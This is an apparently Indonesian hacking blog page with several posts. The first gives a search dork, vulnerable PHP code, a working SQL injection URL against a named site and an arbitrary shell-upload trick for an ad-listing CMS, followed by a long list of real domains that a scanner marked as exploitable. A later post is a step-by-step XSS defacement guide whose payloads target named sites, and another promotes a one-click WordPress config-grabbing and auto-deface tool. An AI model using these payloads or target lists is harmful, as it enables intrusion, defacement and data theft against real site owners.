Sabtu, 31 Oktober 2015

hack CMS IKLAN BARIS



Assalamu’alaikum wr.wb..
Alhamdulillah bisa aktif lagy di underground hehehe..
Kali ini kk minato ingin mengajak kawan” berpesta sedikit :v .. yuk kita langung aja..
##############SQL CMS IKLAN BARIS#####################
# Dork :: inurl:“kategori.php?premium=” atau di kembangin lagy aja.. ;)
Vulnerable found at kategori.php
$id                          = $_GET['id'];
$id_kategori       = $_GET['kategori'];
$qryISI_kat         = select_db("kategori_iklan","*","id_kategori = '$id_kategori'");
$recISI_kat         = fetch_array($qryISI_kat);


$id_iklan_premium         = $_GET['premium'];
$id_iklan_gratis                                = $_GET['gratis'];

$qryISI_premium             = select_db("iklan_premium","*","id_iklan_premium = '$id_iklan_premium'");
$recISI_premium             = fetch_array($qryISI_premium);

$qryISI_gratis    = select_db("iklan_gratis","*","id_iklan_gratis = '$id_iklan_gratis'");
$recISI_gratis     = fetch_array($qryISI_gratis);
Terlihat tdk ada filter disana.. XD
Demo:
vuln column di title,
 http://iklanbitcoin.com/kategori.php?kategori=3'and 0 union select 1,2,concat(0x3c2f7469746c653e3c613e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)))-- -
#########arbitrary file upload CMS IKLAN BARIS ###################
File //iklan_gratis.php
                $img = $_FILES['gambar']['type'];
                                $imgtype = strtolower($img);
                                                /* if (($imgtype != "image/jpeg")&&($imgtype != "image/bmp")&&($imgtype != "image/gif")&&($imgtype != "image/x-png")){
                                                                alert('File gambar tidak dikenali!!!');
                                                } */

NB::Filternya dibuang sama programmernya XD
Demo::

Pasang iklan gratis.. isi box terserah..
Lalu upload file dengan extensi,… shell.php.xxxjpg
Dibawah adalah target yg aku dapatin dr auto scanner ku.. selamat menikmati..lets rock (kita goyang) cms indoesia XD
1. bolamansion.com [NOT_FOUND]

2. afatogel.asia [NOT_FOUND]

3. afapoker.biz [NOT_FOUND]

4. 

5. iklanbet.com [ketemu]

6. iklangroups.com [ketemu]

7. iklansexy.com [NOT_FOUND]

8. iklanpoker.com [ketemu]

9. iklanmurah.net [ketemu]

10. iklan365.com [ketemu]

11. iklanforex.net [ketemu]

12. iklanbitcoin.com [ketemu]

13. iklanword.com [ketemu]

14. iklanbet.com [ketemu]

15. iklangroups.com [ketemu]

16. iklansexy.com [NOT_FOUND]

17. iklanpoker.com [ketemu]

18. iklanmurah.net [ketemu]

19. iklan365.com [ketemu]

20. iklanforex.net [ketemu]

21. iklanbitcoin.com [ketemu]

22. iklanword.com [ketemu]

23. iklanbet.com [ketemu]

24. iklangroups.com [ketemu]

25. iklansexy.com [NOT_FOUND]

26. iklanpoker.com [ketemu]

27. klanmurah.net [NOT_FOUND]

28. iklan365.com [ketemu]

29. iklanforex.net [ketemu]

30. iklanbitcoin.com [ketemu]

31. iklanword.com [ketemu]

32. megaiklan.com [ketemu]

33. mejatangkas.com [ketemu]

34. mentaripoker.us [NOT_FOUND]

35. nagaunik.com [NOT_FOUND]

36. permataiklan.com [ketemu]

37. pokernaga.us [NOT_FOUND]

38. poker228.in [NOT_FOUND]

39. pokerv.net [NOT_FOUND]

40. poker228.info [NOT_FOUND]

41. poker228.asia [NOT_FOUND]

42. poker88plus.com [ketemu]

43. poker88.in [NOT_FOUND]

44. pokerwoles.biz [NOT_FOUND]

45. pokerol.net [NOT_FOUND]

46. samkokbet.info [NOT_FOUND]

47. samkokbet.net [NOT_FOUND]

48. speediklan.com [ketemu]

49. visaiklan.com [ketemu]

50. gamespools.asia [NOT_FOUND]

51. bagusiklan.com [ketemu]

52. serviceiklan.com [NOT_FOUND]

53. pusatpoker.com [NOT_FOUND]

54. mesiniklan.com [ketemu]

55. kucingbirahi.com [NOT_FOUND]

56. karyaiklan.com [ketemu]

57. infotangkas.com [ketemu]

58. iklanbet.com [ketemu]

59. iklangroups.com [ketemu]

60. iklansexy.com [NOT_FOUND]

61. iklanpoker.com [ketemu]

62. iklanmurah.net [ketemu]

63. iklan365.com [ketemu]

64. iklanforex.net [ketemu]

65. iklanbitcoin.com [ketemu]

66. iklanword.com [ketemu]

67. iklanbet.com [ketemu]

68. iklangroups.com [ketemu]

69. iklansexy.com [NOT_FOUND]

70. iklanpoker.com [ketemu]

71. iklanmurah.net [ketemu]

72. iklan365.com [ketemu]

73. iklanforex.net [ketemu]

74. iklanbitcoin.com [ketemu]

75. iklanword.com [ketemu]

76. iklanbet.com [ketemu]

77. iklangroups.com [ketemu]

78. iklansexy.com [NOT_FOUND]

79. iklanpoker.com [ketemu]

80. iklanmurah.net [ketemu]

81. iklan365.com [ketemu]

82. iklanforex.net [ketemu]

83. iklanbitcoin.com [ketemu]

84. iklanword.com [ketemu]

85. iklanbet.com [ketemu]

86. iklangroups.com [ketemu]

87. iklansexy.com [NOT_FOUND]

88. iklanpoker.com [ketemu]

89. iklanmurah.net [ketemu]

90. iklan365.com [ketemu]

91. iklanforex.net [ketemu]

92. iklanbitcoin.com [ketemu]

93. iklanword.com [ketemu]

94. grandiklan.com [ketemu]

95. gejora.com [ketemu]

96. dewarezeki.com [NOT_FOUND]

97. dewamabuk.net [NOT_FOUND]

98. bursajual.com [NOT_FOUND]

99. rimbapoker.us [NOT_FOUND]

100. rgopoker.us [NOT_FOUND]

101. seoiklan.com [ketemu]

102. mejajudi.com [NOT_FOUND]

103. fujiforex.com [ketemu]

104. bejopoker.info [NOT_FOUND]

105. bejopoker.us [NOT_FOUND]

106. bejopoker.info [NOT_FOUND]

107. bejopoker.us [NOT_FOUND]

108. daunpoker.us [ketemu]

109. dewacasino.in [ketemu]

110. dewacasino.asia [NOT_FOUND]

111. dominobet.cc [NOT_FOUND]

112. dominobet.us [NOT_FOUND]

113. dominobet.me [NOT_FOUND]

114. jasapoker.asia [NOT_FOUND]

115. jasapoker.us [ketemu]

116. juaraqq.us [ketemu]

117. juarapoker.us [NOT_FOUND]

118. indoqq.us [NOT_FOUND]

119. juaraqq.us [ketemu]

120. juarapoker.us [NOT_FOUND]

121. lapak303.asia [NOT_FOUND]

122. loginpoker88.com [NOT_FOUND]

123. nagapoker.biz [NOT_FOUND]

124. nagapoker.asia [NOT_FOUND]

125. nagapoker.biz [NOT_FOUND]

126. nagapoker.asia [NOT_FOUND]

127. pokernaga.us [NOT_FOUND]

128. poker228.in [NOT_FOUND]

129. pokerv.net [NOT_FOUND]

130. poker228.info [NOT_FOUND]

131. poker228.asia [NOT_FOUND]

132. poker88plus.com [ketemu]

133. poker88.in [NOT_FOUND]

134. pokerwoles.biz [NOT_FOUND]

135. pokerol.net [NOT_FOUND]

136. pokernaga.us [NOT_FOUND]

137. poker228.in [NOT_FOUND]

138. pokerv.net [NOT_FOUND]

139. poker228.info [NOT_FOUND]

140. poker228.asia [NOT_FOUND]

141. poker88plus.com [ketemu]

142. poker88.in [NOT_FOUND]

143. pokerwoles.biz [NOT_FOUND]

144. pokerol.net [NOT_FOUND]

145. pokernaga.us [NOT_FOUND]

146. poker228.in [NOT_FOUND]

147. pokerv.net [NOT_FOUND]

148. poker228.info [NOT_FOUND]

149. poker228.asia [NOT_FOUND]

150. poker88plus.com [ketemu]

151. poker88.in [NOT_FOUND]

152. pokerwoles.biz [NOT_FOUND]

153. pokerol.net [NOT_FOUND]

154. pokernaga.us [NOT_FOUND]

155. poker228.in [NOT_FOUND]

156. pokerv.net [NOT_FOUND]

157. poker228.info [NOT_FOUND]

158. poker228.asia [NOT_FOUND]

159. poker88plus.com [ketemu]

160. poker88.in [NOT_FOUND]

161. pokerwoles.biz [NOT_FOUND]

162. pokerol.net [NOT_FOUND]

163. pokernaga.us [NOT_FOUND]

164. poker228.in [NOT_FOUND]

165. pokerv.net [NOT_FOUND]

166. poker228.info [NOT_FOUND]

167. poker228.asia [NOT_FOUND]

168. poker88plus.com [ketemu]

169. poker88.in [NOT_FOUND]

170. pokerwoles.biz [NOT_FOUND]

171. pokerol.net [NOT_FOUND]

172. pokernaga.us [NOT_FOUND]

173. poker228.in [NOT_FOUND]

174. pokerv.net [NOT_FOUND]

175. poker228.info [NOT_FOUND]

176. poker228.asia [NOT_FOUND]

177. poker88plus.com [ketemu]

178. poker88.in [NOT_FOUND]

179. pokerwoles.biz [NOT_FOUND]

180. pokerol.net [NOT_FOUND]

181. rgobet.info [NOT_FOUND]

182. rgobet.net [NOT_FOUND]

183. rgobet.us [NOT_FOUND]

184. rgobet.info [NOT_FOUND]

185. rgobet.net [NOT_FOUND]

186. rgobet.us [NOT_FOUND]

187. rgobet.info [NOT_FOUND]

188. rgobet.net [NOT_FOUND]

189. rgobet.us [NOT_FOUND]

190. rgotogel.us [NOT_FOUND]

191. samkokbet.info [NOT_FOUND]

192. samkokbet.net [NOT_FOUND]

193. sayapoker.us [ketemu]

194. togelplus.info [NOT_FOUND]

195. togelplus.net [NOT_FOUND]

196. totojitu.net [NOT_FOUND]

197. totojitu.us [NOT_FOUND]

198. jasapoker.asia [NOT_FOUND]

199. jasapoker.us [ketemu]

200. beritapoker.com [ketemu]

201. idpools.net [ketemu]

202. arwanapoker.us [ketemu]

203. dewacasino.in [ketemu]

204. dewacasino.asia [NOT_FOUND]

205. dewabitcoin.com [NOT_FOUND]

206. dewabatu.com [NOT_FOUND]

207. juraganiklan.com [ketemu]

208. juraganlink.com [ketemu]

209. juraganiklan.com [ketemu]

210. juraganlink.com [ketemu]

211. dewabitcoin.com [NOT_FOUND]

212. dewabatu.com [NOT_FOUND]

213. iklanbet.com [ketemu]

214. iklangroups.com [ketemu]

215. iklansexy.com [NOT_FOUND]

216. iklanpoker.com [ketemu]

217. iklanmurah.net [ketemu]

218. iklan365.com [ketemu]

219. iklanforex.net [ketemu]

220. iklanbitcoin.com [ketemu]

221. iklanword.com [ketemu]

222. mabukpoker.com [NOT_FOUND]

223. iklanbet.com [ketemu]

224. iklangroups.com [ketemu]

225. iklansexy.com [NOT_FOUND]

226. iklanpoker.com [ketemu]

227. iklanmurah.net [ketemu]

228. iklan365.com [ketemu]

229. iklanforex.net [ketemu]

230. iklanbitcoin.com [ketemu]

231. iklanword.com [ketemu]

232. listingbetting.com [NOT_FOUND]

233. pok3r88.com [NOT_FOUND]

234. bisnisgelap.com [ketemu]

235. pokernaga.us [NOT_FOUND]

236. poker228.in [NOT_FOUND]

237. pokerv.net [NOT_FOUND]

238. poker228.info [NOT_FOUND]

239. poker228.asia [NOT_FOUND]

240. poker88plus.com [ketemu]

241. poker88.in [NOT_FOUND]

242. pokerwoles.biz [NOT_FOUND]

243. pokerol.net [NOT_FOUND]

244. bolatangkasplus.com [ketemu]

245. culturalexpertise.com [ketemu]

246. culturacervejeira.com [ketemu]

247. lucchesigalati.com [ketemu]

248. vangeel-ips.com [ketemu]

249. mojotheater.com [ketemu]

250. gmchealth.com [ketemu]

251. bizimaraba.com [NOT_FOUND]

252. dewasurga.com [ketemu]

253. cushingacademylibrary.com [NOT_FOUND]

254. cushingacademy.net [NOT_FOUND]

255. norcatcard.com [ketemu]

256. sourceurban.com [ketemu]

257. internationalpsychoanalysis.org [NOT_FOUND]

258. dawsonstrategic.com [ketemu]

259. iklanbet.com [ketemu]

260. iklangroups.com [ketemu]

261. iklansexy.com [NOT_FOUND]

262. iklanpoker.com [ketemu]

263. iklanmurah.net [ketemu]

264. iklan365.com [ketemu]

265. iklanforex.net [ketemu]

266. iklanbitcoin.com [ketemu]

267. iklanword.com [ketemu]

268. frederictontweets.com [ketemu]

269. bluebuffalohg.com [ketemu]

270. culturalexpertise.com [ketemu]

271. ulturacervejeira.com [NOT_FOUND]

272. diurnalize.com [ketemu]

273. alexavegas.net [ketemu]

 tunggu update selanjutnya yh... bnyk rahasia yg akan kita kaji ^_^ 
salam dr keluarga  Sec7or
Read more

error.php XSS (Cross Site Scripting) Vulnerabilities 2016

error.php XSS (Cross Site Scripting) Vulnerabilities
Title : error.php XSS 

Risk : Cross site scripting, cookie Grabbing 
Poc : error.php?error=
Dork : "inurl:error.php?error="
Author : Minhal Mehdi (devilscafe.in)
browser : Mozilla Firefox 




error.php XSS (Cross Site Scripting) Vulnerabilities


1). Go to Google and now type the dork "inurl:error.php?error="
in search results ignore all the extra results with different URL Like : error-php-error.php
pick site with url www.site.com/error.php?error= Only..

2). Now Type your first Tag to Check the vulnerability 
example : www.site.com/error.php?error=<h1>Test</h1>
if it will show you "Test" word in Header tag this Its Vulnerable

Here are few ways in you you can inject your xss vector :) ..

How To show Header XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>

To show header in center XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>

How to show Title XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>

How to Add a Image XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbRsPwyz0WHjVvS9m-EE7xmkasRkwpLH-R-e_wavQ9gNje9ClsH6xNSckw1eGE9U2NGciJG9HzFia4upikWlxx2fD35fLI3chd1XMUe6xaeX_i55frSH-BKQ3tJCw_5f6UE7OHLTPUNiyR/s640/cats.jpg"/>

How to add a Message XSS injection
http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>

How to write message in next lines XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p> 

How To add a scrolling Text XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>

How To Add a alert box XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>

How To add background colour in page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<body bgcolor="red"/>

How to Add a full deface Page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>
<marquee><b>www.thehackerstore.net</b></marquee>

you can add more html and javscript tags here,
here is another demo site : 
www.carrubbers.org/error.php?error=<center><h1>www.thehackerstore.net</h1></center>
find More website with dorks :)

if you have any queries feel free to comment below :)


Read more

Jumat, 30 Oktober 2015

Top 5 "Hacker" Friendly Operating Systems


Top 5 "Hacker" Friendly Operating Systems :Hello Everyone !! Most of my readers asked me Which is The Best Operating System for Doing Hacking Activities, such as Hacking websites, Wireless Networks, Passwords, Network Sniffing ,reverse engineering, application hacking and other encrypting and spoofing hacking. So I thought of writing an article on this... Today In this article I will be sharing some informations about awesome Hacking Operating Systems (OS) ;) ...

Top 5 Hacker Friendly Operating Systems 

Here is the list of Top 5 Hacker Friendly Operating Systems about which we are going to discuss.. 
  1. Kali Linux
  2. Backtrck 5
  3. BugTraq
  4. BlackBuntu
  5. DEFT

Top 5 Hacker Friendly Operating Systems 

So lets come to our topic Top 5 Hacker Friendly Operating Systems. Below is the full list of top 5 Hacker friendly operating systems. If you are a Hacker you can use them and if not them can be by using them ;) .. so here it starts! ...

#1 Kali Linux


Kali Linux is based upon Debian Linux, rather than Ubuntu and new streamlined storehouses synchronize with the Debian vaults 4 times each day, continually furnishing clients with the most recent bundle upgrades and security fixes accessible.

With more than 300 penetration testing tools, totally free, Open source, Vast wireless gadget support, GPG marked bundles and repos, Multi-dialect, Completely adaptable make this appropriation one of the best accessible gem of hacking group.

You can Donload Kali Linux From the link given below :)


NOTE: Default root password is same "root" :)

#2 BackTrack 5




Backtrack is a Linux OS intended for security experts. Who manages framework and web application security and different fields, for example, cyber crime scene investigation.

This Operating System includes all the security evaluations and elements till date.This distro got it all,Slick Interface,Powerful yet most recent tools,high perfectly substantial programming library,tons of instructional exercise. 

You can download Backtrack from below link.!



BugTraq offers the most exhaustive dispersion, ideal, steady and programmed security to date. Bugtraq is an appropriation in light of the 2.6.38 part has an extensive variety of infiltration and legal apparatuses. Bugtraq can introduce from a Live DVD or USB drive, the circulation is tweaked to the last bundle, designed and redesigned the portion and the part has been fixed for better execution and to perceive an assortment of equipment, including remote infusion patches pentesting different disseminations don't perceive.

Administrative improvements of the system for better management of services. Extended the scope of acknowledgment for infusion remote drivers. Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc...

Awesome Scripts from Bugtraq-Team (SVN upgrades devices, erase tracks, indirect accesses, Spyder-sql, and so on.) Stability and performance optimized: Enhanced execution blaze and java and begin cleansing superfluous administrations. So that the client can utilize just the administrations you truly need.  It has consolidated the formation of the client in the establishment, which is made with all framework designs.


4# BlackBuntu



Blackbuntu is dispersion for infiltration testing which was extraordinarily intended for security preparing understudies and professionals of data security. It's presently being assembled utilizing the xubuntu 12.04.This release has an extensive programming library and almost 100000's instructional exercises flying on YouTube and different locales. Blackbuntu keeps running on any PC,new or old,because of its less requirements.The Main developer,Krit Kadnok says "It's made time permitting as a hobby."Get Blackbuntu Here




#5 DEFT (Digital Evidence & Forensic Toolkit.)


DEFT (acronym for Digital Evidence and Forensic Toolkit) is a Xubuntu Linux-based Computer Forensics live CD. It is intended to meet police, agents, framework director and Computer Forensics authority's requirements.

DEFT Linux v5 depends on the new Kernel 2.6.31 (Linux side) and the DEFT Extra 2.0 (Computer Forensic GUI) with the best freeware Windows Computer Forensic instruments. DEFT it's another idea of Computer Forensic live framework that utilization LXDE as desktop environment and thunar document administrator and mount director as instrument for gadget administration.

It is a simple to utilize framework that incorporates an incredible equipment identification and the best free and open source applications committed to episode reaction and PC crime scene investigation.

DEFT is intended to be utilized by:
  • police 
  • examiners 
  • framework executive 
  • people 

and every one of the general population who need to utilize criminological instrument yet don't have the foggiest idea about the open source agent frameworks and the Forensic methods. Get This Swiss Knife of PC world Here

Read more

Selasa, 27 Oktober 2015

Config and Auto Deface in Worpdress

Config and Auto Deface in Wordpress..

ngk usah capek2 untuk nyari config + masuk ke database, ganti u\p admin, login, nanem shell, deface..

karena semua fitur itu ada di tool ini..
cuma 1x klik...



*nb:
ganti $nick.

klo token ngk ada.. berarti tinggalin aja..
klo token ada + ngk berhasil mepes.. coba lu pake manual..
Read more